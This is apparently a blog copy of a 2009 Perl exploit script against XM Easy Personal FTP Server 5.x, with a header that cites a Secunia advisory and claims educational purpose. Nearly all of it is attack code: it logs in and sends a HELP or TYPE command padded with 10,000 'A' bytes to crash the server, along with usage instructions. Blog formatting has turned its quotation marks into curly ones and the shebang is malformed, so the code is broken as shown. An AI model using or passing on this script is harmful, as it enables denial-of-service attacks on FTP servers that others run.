SecurityGyan

#!usr/bin/perl -w

####################################################################
# XM Easy Personal FTP Server 5.x allows remote attackers to cause a denial of service
# via a “HELP” or “TYPE” command with an overly long argument.
# Refer:
# http://secunia.com/advisories/35271/
#http://downloads.securityfocus.com/vulnerabilities/exploits/35239-2.pl
#
# Product link: http://www.dxm2008.com/
# Vunerbility discovered by: NeerajT of Nevis Labs
#http://hypersecurity.blogspot.com/2009/06/xm-personal-ftp-server-vulnerability.html

#
#$$$$$This was strictly written for educational purpose. Use it at your own risk.$$$$$$$$$$
#$$$$$Author will not bare any responsibility for any damages watsoever.$$$$$$$$$$$$$$
#
# Author: Vinod Sharma
# Email: vinodsharma[underscore]mimit[at]gmail.com
# Blog: http://securitygyan.com/
# Date: 09th june, 2009
#
#
###Thanks to all the Security Folks###
###################################################################

use IO::Socket;

my $server_ip=$ARGV[0];
my $server_port=$ARGV[1];
my $username=$ARGV[2];
my $password=$ARGV[3];
my $command=$ARGV[4];
my $buffer=$command .” ” .”\x41″ x 10000 .”\r\n”;

if(($#ARGV + 1)!=5)
{
print “\nUsage: XM_FTP_Serv_Exploit.pl server_ip_address server_port username password command\n”;
print “\nargument command can have a value HELP or TYPE\n”;
print “\nExample: XM_FTP_Serv_Exploit.pl 192.16.16.8 21 anonymous 123456 HELP”;

exit;
}

$socket = new IO::Socket::INET (PeerAddr =>$server_ip, PeerPort => $server_port, Proto => ‘tcp’, ) or die “Couldn’t connect to Server\n”;

while (1)
{

$socket->recv($recv_data,1024);
print “RECIEVED: $recv_data”;

$send_data1 =”USER “.$username.”\r\n”;
$socket->send($send_data1);
$socket->recv($recv_data1,1024);
print “RECIEVED: $recv_data1″;

$send_data2 =”PASS “.$password.”\r\n”;
$socket->send($send_data2);
$socket->recv($recv_data2,1024);
print “RECIEVED: $recv_data2″;

$socket->send($buffer);
print “\nAttack is send…………………\n”;
$socket->recv($recv_data3,1024);
print “RECIEVED: $recv_data3″;

close $socket;

}